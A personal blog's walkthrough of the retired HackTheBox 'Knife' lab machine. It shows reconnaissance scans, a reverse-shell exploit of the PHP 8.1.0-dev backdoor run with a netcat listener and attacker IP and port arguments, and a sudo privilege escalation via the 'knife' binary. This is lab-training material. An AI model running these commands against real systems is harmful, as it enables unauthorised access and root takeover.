<!DOCTYPE html>
<html lang="en" data-theme="light"><head>
    <title> Shibin B Shaji | HackTheBox - Knife </title>
    <meta charset="utf-8"><meta name="generator" content="Hugo 0.118.2"><meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover">
    <meta name="description" content="Script kiddie | Full Stack Developer | Designer | Gamer">
    
    <link rel="stylesheet" href="https://shibinbshaji.com/css/style.min.3bc3fa35d9e84b19ef733119c6a0250df66531652a664b5e59e9d5fe0c37142e.css" integrity="sha256-O8P6NdnoSxnvczEZxqAlDfZlMWUqZkteWenV/gw3FC4=" type="text/css">
    
    <link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
    <base href="https://shibinbshaji.com">
    
    <link rel="shortcut icon" href="https://shibinbshaji.com/favicons/favicon.ico" type="image/x-icon">
    <link rel="apple-touch-icon" sizes="180x180" href="https://shibinbshaji.com/favicons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://shibinbshaji.com/favicons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://shibinbshaji.com/favicons/favicon-16x16.png">
    <link rel="canonical" href="https://shibinbshaji.com/posts/htb-knife/">
    
    
    <script type="text/javascript" src="https://shibinbshaji.com/js/anatole-header.min.ed912806a856a21a5e5ded5fc93e811a3266f4cff7026a0897794ada2980d487.js" integrity="sha256-7ZEoBqhWohpeXe1fyT6BGjJm9M/3AmoIl3lK2imA1Ic="></script>


        <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">

</head>
<body><style>
   
body { background: black }

.blink {
  position: relative;
  font-family: Monaco, Arial, Helvetica, sans-serif;
  line-height: 24px;
  font-size: 24px;
  color: white;


}

.blink::after {
  content: "";
  position: absolute;
  top: 0;
  right: -15px;
   
  display: inline-block;
  background-color: #606060;
  vertical-align: top;
  width: 10px;
   
  height: 24px;
   
  -webkit-animation: blink 1s step-end infinite;
  animation: blink 1s step-end infinite;
}

@-webkit-keyframes blink {
  0% { opacity: 1.0; }
  50% { opacity: 0.0; }
  100% { opacity: 1.0; }
}

@keyframes blink {
  0% { opacity: 1.0; }
  50% { opacity: 0.0; }
  100% { opacity: 1.0; }
}
  </style>
<div class="sidebar animated fadeInDown">
    <div class="logo-title">
      <div class="title">
        <img src="https://shibinbshaji.com/images/profile.jpg" alt="profile picture">
        <h3 title=""><a href="/">&lt; SHIBIN B SHAJI /&gt;<span class="blink"></span></a></h3>
        <div class="description">
          <p>Script kiddie | Full Stack Developer | Designer | Gamer</p>
        </div>
      </div>
    </div>
    <ul class="social-links">
        
        <li>
        <a href="https://www.linkedin.com/in/shibinbshaji/" rel="me" aria-label="Linkedin">
          <i class="fa fa-2x fa-linkedin" aria-hidden="true"></i>
        </a>
        </li>

        
        <li>
        <a href="https://twitter.com/shibinbshaji06" rel="me" aria-label="Twitter">
          <i class="fa fa-2x fa-twitter" aria-hidden="true"></i>
        </a>
        </li>

        
        <li>
        <a href="https://github.com/shibinbshaji/" rel="me" aria-label="GitHub">
          <i class="fa fa-2x fa-github" aria-hidden="true"></i>
        </a>
        </li>

        
        <li>
        <a href="https://www.instagram.com/shibinbshaji/" rel="me" aria-label="instagram">
          <i class="fa fa-2x fa-instagram" aria-hidden="true"></i>
        </a>
        </li>

        
        <li>
        <a href="mailto:shibinbshaji007@gmail.com" rel="me" aria-label="e-mail">
          <i class="fa fa-2x fa-envelope" aria-hidden="true"></i>
        </a>
        </li>

        
        <li>
        <a href="https://steamcommunity.com/id/shibinzz" rel="me" aria-label="steam">
          <i class="fa fa-2x fa-steam" aria-hidden="true"></i>
        </a>
        </li>

        
    </ul>
    <div class="footer">
        <div class="by_farbox">&copy; Shibin B Shaji 2023 </div>
      </div>
    </div>
</div>
<div class="main">
            <div class="page-top animated fadeInDown">
    <ul class="nav">
      
        
        
        
        <li><a  href="/" title="">&lt;shibin.b.shaji/&gt;</a></li>
        
        
        <li><a  href="/posts/" title="">Posts</a></li>
        
        
        <li><a  href="/notes/" title="">Notes</a></li>
        
    </ul>
    <div class="themeswitcher">
        <a class="theme-switch" title="Switch Theme">
            <i class="fa fa-adjust fa-fw" aria-hidden="false"></i>
        </a>
    </div>
</div>

            <div class="autopagerize_page_element">
                <div class="content">
  <style>
    img{
      display: block;
 margin-left: auto;
 margin-right: auto;
 width: 50%;
    }
    </style>
<div class="post animated fadeInDown">
    <div class="post-content">

      <div class="post-title">
        <h3>HackTheBox - Knife
        </h3>
        
        </div>

    <p>This is a retired Easy Linux Box.</p>
<p><strong>Machine IP:</strong> 10.10.10.242</p>
<p><strong>Machine OS:</strong> Linux</p>
<p>Starting with nmap with <code>-sC</code> and <code>-sV</code> flags:</p>
<p><code>nmap -sV -sC 10.10.10.242</code></p>
<p>yields the result:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Starting Nmap 7.91 <span style="color:#f92672">(</span> https://nmap.org <span style="color:#f92672">)</span> at 2021-07-13 23:40 IST
</span></span><span style="display:flex;"><span>Nmap scan report <span style="color:#66d9ef">for</span> 10.10.10.242
</span></span><span style="display:flex;"><span>Host is up <span style="color:#f92672">(</span>0.29s latency<span style="color:#f92672">)</span>.
</span></span><span style="display:flex;"><span>Not shown: <span style="color:#ae81ff">997</span> closed ports
</span></span><span style="display:flex;"><span>PORT     STATE    SERVICE VERSION
</span></span><span style="display:flex;"><span>22/tcp   open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span style="color:#f92672">(</span>Ubuntu Linux; protocol 2.0<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>| ssh-hostkey:
</span></span><span style="display:flex;"><span>|   <span style="color:#ae81ff">3072</span> be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 <span style="color:#f92672">(</span>RSA<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>|   <span style="color:#ae81ff">256</span> bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e🆎22:0e:c0:ee <span style="color:#f92672">(</span>ECDSA<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>|_  <span style="color:#ae81ff">256</span> 1a🇩🇪a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 <span style="color:#f92672">(</span>ED25519<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>80/tcp   open     http    Apache httpd 2.4.41 <span style="color:#f92672">((</span>Ubuntu<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>|_http-server-header: Apache/2.4.41 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>|_http-title:  Emergent Medical Idea
</span></span><span style="display:flex;"><span>6792/tcp filtered unknown
</span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style="display:flex;"><span>Nmap <span style="color:#66d9ef">done</span>: <span style="color:#ae81ff">1</span> IP address <span style="color:#f92672">(</span><span style="color:#ae81ff">1</span> host up<span style="color:#f92672">)</span> scanned in 110.35 seconds
</span></span></code></pre></div><p>We can see that Ports 22, 80 and 6792 are open. Since port 80 is open, it might have a web page. Visiting the IP in a browser gives this page.</p>
<p><img src="/images/knife1.png" alt=""></p>
<p>homepage</p>
<p>Now to find out the directories this web application has, we can use a tool called GoBuster. Running go buster with the command:</p>
<p><code>gobuster -dir --url 10.10.10.242 --wordlist &lt;wordlist&gt;</code></p>
<p>gives the result:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span>Gobuster v3.0.1
</span></span><span style="display:flex;"><span>by OJ Reeves <span style="color:#f92672">(</span>@TheColonial<span style="color:#f92672">)</span> &amp; Christian Mehlmauer <span style="color:#f92672">(</span>@_FireFart_<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Url:            http://10.10.10.242
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Threads:        <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Wordlist:       /Users/shibinbshaji/essentials/wordlists/common.txt
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Status codes:   200,204,301,302,307,401,403
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> User Agent:     gobuster/3.0.1
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>+<span style="color:#f92672">]</span> Timeout:        10s
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span>2021/07/13 23:50:02 Starting gobuster
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span>/.hta <span style="color:#f92672">(</span>Status: 403<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>/.htaccess <span style="color:#f92672">(</span>Status: 403<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>/.htpasswd <span style="color:#f92672">(</span>Status: 403<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>/index.php <span style="color:#f92672">(</span>Status: 200<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>/server-status <span style="color:#f92672">(</span>Status: 403<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span><span style="display:flex;"><span>2021/07/13 23:52:22 Finished
</span></span><span style="display:flex;"><span><span style="color:#f92672">===============================================================</span>
</span></span></code></pre></div><p>This does not give any useful results. Trying Nikto:</p>
<p><code>nikto -h http://10.10.10.242</code></p>
<p>gives the result</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>❯ nikto -h http://10.10.10.242                                                                                       ─╯
</span></span><span style="display:flex;"><span>- Nikto v2.1.6
</span></span><span style="display:flex;"><span>---------------------------------------------------------------------------
</span></span><span style="display:flex;"><span>+ Target IP:          10.10.10.242
</span></span><span style="display:flex;"><span>+ Target Hostname:    10.10.10.242
</span></span><span style="display:flex;"><span>+ Target Port:        <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>+ Start Time:         2021-07-14 00:02:40 <span style="color:#f92672">(</span>GMT5.5<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>---------------------------------------------------------------------------
</span></span><span style="display:flex;"><span>+ Server: Apache/2.4.41 <span style="color:#f92672">(</span>Ubuntu<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>+ Retrieved x-powered-by header: PHP/8.1.0-dev
</span></span><span style="display:flex;"><span>+ The anti-clickjacking X-Frame-Options header is not present.
</span></span><span style="display:flex;"><span>+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
</span></span><span style="display:flex;"><span>+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
</span></span><span style="display:flex;"><span>+ No CGI Directories found <span style="color:#f92672">(</span>use <span style="color:#e6db74">&#39;-C all&#39;</span> to force check all possible dirs<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
</span></span></code></pre></div><p>Nikto results suggest that PHP/8.1.0-dev is used. Googling a bit suggests that this version had a vulnerable code snippet which gives us an interactive shell. Exploit-db had an exploit for that too! :D</p>
<p><a href="https://www.exploit-db.com/exploits/49933">Offensive Security&rsquo;s Exploit Database Archive</a></p>
<p>Running the script from exploit-db gives us :</p>
<p><img src="/posts/htb-knife/knife2.png" alt=""></p>
<p>Google also showed result of a GitHub repo. Save the backdoor script from <a href="https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py">https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py</a>. Open a netcat listener using the command:</p>
<p><code>nc -lnv 1337</code></p>
<p>Run the backdoor script:</p>
<p><code>python3 [backdoor.py](http://backdoor.py/) [-h] &lt;target URL&gt; &lt;attacker IP&gt; &lt;attacker PORT&gt;</code></p>
<p><img src="/posts/htb-knife/knife3.png" alt=""></p>
<p>After gaining access to the machine, navigate to <code>cat /home/james/user.txt</code> . This will give the <strong>user flag</strong>.</p>
<p>Now, to see what all commands can be run as sudo:</p>
<p><code>sudo -l</code> will give:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Matching Defaults entries <span style="color:#66d9ef">for</span> james on knife:
</span></span><span style="display:flex;"><span>    env_reset, mail_badpass,
</span></span><span style="display:flex;"><span>    secure_path<span style="color:#f92672">=</span>/usr/local/sbin<span style="color:#ae81ff">\:</span>/usr/local/bin<span style="color:#ae81ff">\:</span>/usr/sbin<span style="color:#ae81ff">\:</span>/usr/bin<span style="color:#ae81ff">\:</span>/sbin<span style="color:#ae81ff">\:</span>/bin<span style="color:#ae81ff">\:</span>/snap/bin
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>User james may run the following commands on knife:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">(</span>root<span style="color:#f92672">)</span> NOPASSWD: /usr/bin/knife
</span></span></code></pre></div><p><code>knife</code> can be run as sudo. It seems that the name of the box was a direct clue to get the root.</p>
<p>Using <a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a> to find any exploits of <code>knife</code>:</p>
<p><img src="/posts/htb-knife/knife4.png" alt=""></p>
<p>Running the command from gtfobins.</p>
<p>We are root!!!</p>
<p>Now to get the root flag, cd into /root folder.</p>
<p><img src="/posts/htb-knife/knife5.png" alt=""></p>

    </div>
    <div class="post-footer">
      <div class="info">
        
        
    <span class="separator"><a class="tag" href="/tags/infosec/">infosec</a><a class="tag" href="/tags/cyber-security/">cyber security</a><a class="tag" href="/tags/penetration-testing/">penetration testing</a><a class="tag" href="/tags/hacking/">hacking</a><a class="tag" href="/tags/hackthebox/">hackthebox</a></span>

      </div>
    </div>

    
</div>


                </div>
            </div>
        </div>
</body>



<script type="text/javascript" src="https://shibinbshaji.com/js/jquery.min.e80d7e6008943348b2c88cd12f10e546083ff6a88f06b4afac7151b78886417e.js" integrity="sha256-6A1&#43;YAiUM0iyyIzRLxDlRgg/9qiPBrSvrHFRt4iGQX4="></script>




<script type="text/javascript" src="https://shibinbshaji.com/js/bundle.min.3ebad6bf39b2e7c2f899d3ed9bc97e8c0c1ead7a1b57472e3387321f673b8077.js" integrity="sha256-PrrWvzmy58L4mdPtm8l&#43;jAwerXobV0cuM4cyH2c7gHc="></script>

<script type="text/javascript" src="https://shibinbshaji.com/js/medium-zoom.min.e1c6918cbaa90022a5612f0bd71c7bf3be6d036614c5729cebfe14f7b91fa4bc.js" integrity="sha256-4caRjLqpACKlYS8L1xx7875tA2YUxXKc6/4U97kfpLw="></script>
<script type="application/javascript">
var doNotTrack = false;
if (!doNotTrack) {
	window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
	ga('create', 'UA-168075703-1', 'auto');
	
	ga('send', 'pageview');
}
</script>
<script async src='https://www.google-analytics.com/analytics.js'></script>
</html></body>

</html>
